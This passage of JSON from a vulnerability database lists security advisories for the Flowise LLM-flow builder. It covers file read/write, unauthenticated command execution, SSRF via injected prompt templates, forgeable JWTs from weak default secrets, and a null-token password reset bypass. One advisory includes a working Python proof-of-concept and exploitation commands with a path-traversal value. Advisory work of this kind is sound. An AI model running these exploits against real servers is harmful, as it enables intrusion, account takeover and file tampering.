"http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41268", "GHSA-cvrr-qhgw-2mm6" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pzza-9xq9-a7de" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/128052?format=api", "vulnerability_id": "VCID-qgs1-hazv-67b8", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. In versions prior to 3.0.8, WriteFileTool and ReadFileTool in Flowise do not restrict file path access, allowing authenticated attackers to exploit this vulnerability to read and write arbitrary files to any path in the file system, potentially leading to remote command execution. Flowise 3.0.8 fixes this vulnerability.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-61913", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01058", "scoring_system": "epss", "scoring_elements": "0.78031", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-61913" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/pull/5275", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/pull/5275" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3", "reference_id": "1fb12cd93143592a18995f63b781d25b354d48a3", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61913", "reference_id": "CVE-2025-61913", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61913" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8", "reference_id": "flowise%403.0.8", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c", "reference_id": "GHSA-j44m-5v8f-gc9c", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c" }, { "reference_url": "https://github.com/advisories/GHSA-jv9m-vf54-chjj", "reference_id": "GHSA-jv9m-vf54-chjj", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jv9m-vf54-chjj" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj", "reference_id": "GHSA-jv9m-vf54-chjj", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-10-09T13:31:34Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34082?format=api", "purl": "pkg:npm/flowise@3.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8" } ], "aliases": [ "CVE-2025-61913", "GHSA-jv9m-vf54-chjj" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qgs1-hazv-67b8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80885?format=api", "vulnerability_id": "VCID-rgmv-6bqh-eqf2", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) vulnerability exists in FlowiseAI's POST/GET API Chain components that allows unauthenticated attackers to force the server to make arbitrary HTTP requests to internal and external systems. By injecting malicious prompt templates, attackers can bypass the intended API documentation constraints and redirect requests to sensitive internal services, potentially leading to internal network reconnaissance and data exfiltration. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41271", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00115", "scoring_system": "epss", "scoring_elements": "0.29839", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41271" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41271", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41271" }, { "reference_url": "https://github.com/advisories/GHSA-6r77-hqx7-7vw8", "reference_id": "GHSA-6r77-hqx7-7vw8", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6r77-hqx7-7vw8" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6r77-hqx7-7vw8", "reference_id": "GHSA-6r77-hqx7-7vw8", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T19:45:41Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6r77-hqx7-7vw8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41271", "GHSA-6r77-hqx7-7vw8" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rgmv-6bqh-eqf2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92665?format=api", "vulnerability_id": "VCID-t839-eydz-1ud4", "summary": "The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in Flowise versions before 3.0.1 the default installation operates without authentication unless explicitly configured. This combination allows unauthenticated network attackers to execute unsandboxed OS commands.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-8943", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.8647", "scoring_system": "epss", "scoring_elements": "0.99431", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-8943" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8943", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8943" }, { "reference_url": "https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578" }, { "reference_url": "https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578/", "reference_id": "flowise-os-command-remote-code-execution-jfsa-2025-001380578", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-14T13:36:14Z/" } ], "url": "https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578/" }, { "reference_url": "https://github.com/advisories/GHSA-2vv2-3x8x-4gv7", "reference_id": "GHSA-2vv2-3x8x-4gv7", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-2vv2-3x8x-4gv7" } ], "fixed_packages": [], "aliases": [ "CVE-2025-8943", "GHSA-2vv2-3x8x-4gv7" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t839-eydz-1ud4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359833?format=api", "vulnerability_id": "VCID-tdm1-91mc-8kgr", "summary": "Flowise: Weak Default JWT Secrets\n**Detection Method:** Kolega.dev Deep Code Scan\n\n| Attribute | Value |\n|---|---|\n| Severity | Critical |\n| Location | packages/server/src/enterprise/middleware/passport/index.ts:29-34 |\n| Practical Exploitability | High |\n| Developer Approver | faizan@kolega.ai |\n\n### Description\nJWT secrets have weak hardcoded defaults ('auth_token', 'refresh_token', 'AUDIENCE', 'ISSUER'). Attackers can forge valid JWTs and impersonate any user.\n\n### Affected Code\n```\nconst jwtAudience = process.env.JWT_AUDIENCE || 'AUDIENCE'\nconst jwtIssuer = process.env.JWT_ISSUER || 'ISSUER'\nconst jwtAuthTokenSecret = process.env.JWT_AUTH_TOKEN_SECRET || 'auth_token'\nconst jwtRefreshSecret = process.env.JWT_REFRESH_TOKEN_SECRET || process.env.JWT_AUTH_TOKEN_SECRET || 'refresh_token'\n```\n\n### Evidence\nAll JWT defaults are weak strings. Refresh token falls back to auth token which is a design flaw. If any environment variable is unset, weak default is used.\n\n### Impact\nComplete authentication bypass. Attackers can forge valid JWTs for any user account. No authentication required to access protected endpoints. Can escalate to admin access.\n\n### Recommendation\nRemove all default secrets - require all JWT environment variables to be explicitly set. Add startup validation throwing error if any JWT secret is missing. Use cryptographically random secrets (256+ bits) for each secret independently. Implement JWT secret rotation mechanism.\n\n### Notes\nThe JWT secrets have genuinely weak hardcoded defaults ('auth_token', 'refresh_token', 'AUDIENCE', 'ISSUER') at lines 29-34. If an administrator deploys without setting the environment variables JWT_AUTH_TOKEN_SECRET, JWT_REFRESH_TOKEN_SECRET, JWT_AUDIENCE, and JWT_ISSUER, the application will use these trivially guessable values. An attacker knowing these defaults (which are publicly visible in the source code) can forge valid JWTs to impersonate any user, including administrators. The fallback chain at line 34 where jwtRefreshSecret falls back to jwtAuthTokenSecret is an additional design weakness - if only JWT_AUTH_TOKEN_SECRET is set, both tokens share the same secret. While .env.example files provide placeholder values, these are also weak and publicly visible. The application should fail to start if these secrets are not explicitly configured with strong values, rather than silently falling back to insecure defaults.", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cc4f-hjpj-g9p8", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cc4f-hjpj-g9p8" }, { "reference_url": "https://github.com/advisories/GHSA-cc4f-hjpj-g9p8", "reference_id": "GHSA-cc4f-hjpj-g9p8", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cc4f-hjpj-g9p8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "GHSA-cc4f-hjpj-g9p8" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tdm1-91mc-8kgr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81038?format=api", "vulnerability_id": "VCID-v1nz-wwsu-qycg", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP_DENY_LIST for axios and node-fetch libraries, the built-in Node.js http, https, and net modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services) This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41270", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00083", "scoring_system": "epss", "scoring_elements": "0.24258", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41270" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41270", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41270" }, { "reference_url": "https://github.com/advisories/GHSA-xhmj-rg95-44hv", "reference_id": "GHSA-xhmj-rg95-44hv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xhmj-rg95-44hv" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-xhmj-rg95-44hv", "reference_id": "GHSA-xhmj-rg95-44hv", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:27:48Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-xhmj-rg95-44hv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41270", "GHSA-xhmj-rg95-44hv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v1nz-wwsu-qycg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359770?format=api", "vulnerability_id": "VCID-v9hg-7pex-g3dp", "summary": "Flowise: Path Traversal in Vector Store basePath\n## Summary\n\nThe Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.\n\n## Vulnerability Details\n\n| Field | Value |\n|-------|-------|\n| Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) |\n| Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) |\n\n## Prerequisites\n\n1. **Authentication**: Valid API token with `documentStores:upsert-config` permission\n2. **Document Store**: An existing Document Store with at least one processed chunk\n3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key)\n\n## Root Cause\n\n### Faiss (`Faiss.ts`)\n\n```typescript\nasync upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {\n const basePath = nodeData.inputs?.basePath as string // User-controlled\n // ...\n const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)\n await vectorStore.save(basePath) // Direct filesystem write, no validation\n}\n```\n\n### SimpleStore (`SimpleStore.ts`)\n\n```typescript\nasync upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {\n const basePath = nodeData.inputs?.basePath as string // User-controlled\n \n let filePath = ''\n if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')\n else filePath = basePath // Used directly without sanitization\n \n const storageContext = await storageContextFromDefaults({ persistDir: filePath }) // Writes to arbitrary path\n}\n```\n\n## Impact\n\nAn authenticated attacker can:\n\n1. **Write files to arbitrary locations** on the server filesystem\n2. **Overwrite existing files** if the process has write permissions\n3. **Potential for code execution** by writing to web-accessible directories or startup scripts\n4. **Data exfiltration** by writing to network-mounted filesystems\n\n## Proof of Concept\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPOC: Path Traversal in Vector Store basePath (CWE-22)\n\nUsage:\n python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>\n\"\"\"\n\nimport argparse\nimport json\nimport urllib.request\nimport urllib.error\n\ndef post_json(url, data, headers):\n req = urllib.request.Request(\n url,\n data=json.dumps(data).encode(\"utf-8\"),\n headers={**headers, \"Content-Type\": \"application/json\"},\n method=\"POST\",\n )\n with urllib.request.urlopen(req, timeout=120) as resp:\n return resp.status, resp.read().decode(\"utf-8\", errors=\"replace\")\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--target\", required=True)\n ap.add_argument(\"--token\", required=True)\n ap.add_argument(\"--store-id\", required=True)\n ap.add_argument(\"--credential\", required=True)\n ap.add_argument(\"--base-path\", default=\"/tmp/flowise-path-traversal-poc\")\n args = ap.parse_args()\n\n payload = {\n \"storeId\": args.store_id,\n \"vectorStoreName\": \"faiss\",\n \"vectorStoreConfig\": {\"basePath\": args.base_path},\n \"embeddingName\": \"openAIEmbeddings\",\n \"embeddingConfig\": {\"credential\": args.credential},\n }\n\n url = args.target.rstrip(\"/\") + \"/api/v1/document-store/vectorstore/insert\"\n headers = {\"Authorization\": f\"Bearer {args.token}\"}\n\n try:\n status, body = post_json(url, payload, headers)\n print(body)\n except urllib.error.HTTPError as e:\n print(e.read().decode())\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Setup\n\n1. Create a Document Store in Flowise UI\n2. Add a Document Loader (e.g., Plain Text) with any content\n3. Click \"Process\" to create chunks\n4. Note the Store ID from the URL\n5. Get your embedding credential ID from Settings → Credentials\n\n### Exploitation\n\n```bash\n# Write to /tmp\npython poc.py \\\n --target http://127.0.0.1:3000 \\\n --token <API_TOKEN> \\\n --store-id <STORE_ID> \\\n --credential <OPENAI_CREDENTIAL_ID> \\\n --base-path /tmp/flowise-pwned\n\n# Path traversal variant\npython poc.py \\\n --target http://127.0.0.1:3000 \\\n --token <API_TOKEN> \\\n --store-id <STORE_ID> \\\n --credential <OPENAI_CREDENTIAL_ID> \\\n --base-path \"../../../../tmp/traversal-test\"\n```\n\n### Evidence\n\n```\n$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned\n\n{\"numAdded\":1,\"addedDocs\":[{\"pageContent\":\"Lorem Ipsum\",\"metadata\":{\"docId\":\"d84d9581-0778-454d-984e-42b372b1b555\"}}],\"totalChars\":0,\"totalChunks\":0,\"whereUsed\":[]}\n\n$ ls -la /tmp/flowise-pwned/\ntotal 16\ndrwxr-xr-x 4 user wheel 128 Jan 17 12:00 .\ndrwxrwxrwt 12 root wheel 384 Jan 17 12:00 ..\n-rw-r--r-- 1 user wheel 1234 Jan 17 12:00 docstore.json\n-rw-r--r-- 1 user wheel 5678 Jan 17 12:00 faiss.index\n```", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w6v6-49gh-mc9w", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:H/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w6v6-49gh-mc9w" }, { "reference_url": "https://github.com/advisories/GHSA-w6v6-49gh-mc9w", "reference_id": "GHSA-w6v6-49gh-mc9w", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w6v6-49gh-mc9w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "GHSA-w6v6-49gh-mc9w" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v9hg-7pex-g3dp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80704?format=api", "vulnerability_id": "VCID-w9yr-5jbp-q7fm", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, this vulnerability allows remote attackers to bypass authentication on affected installations of FlowiseAI Flowise. Authentication is not required to exploit this vulnerability. The specific flaw exists within the resetPassword method of the AccountService class. There is no check performed to ensure that a password reset token has actually been generated for a user account. By default the value of the reset token stored in a users account is null, or an empty string if they've reset their password before. An attacker with knowledge of the user's email address can submit a request to the \"/api/v1/account/reset-password\" endpoint containing a null or empty string reset token value and reset that user's password to a value of their choosing. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41276", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00732", "scoring_system": "epss", "scoring_elements": "0.73173", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41276" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41276", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41276" }, { "reference_url": "https://github.com/advisories/GHSA-f6hc-c5jr-878p", "reference_id": "GHSA-f6hc-c5jr-878p", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f6hc-c5jr-878p" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f6hc-c5jr-878p", "reference_id": "GHSA-f6hc-c5jr-878p", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": 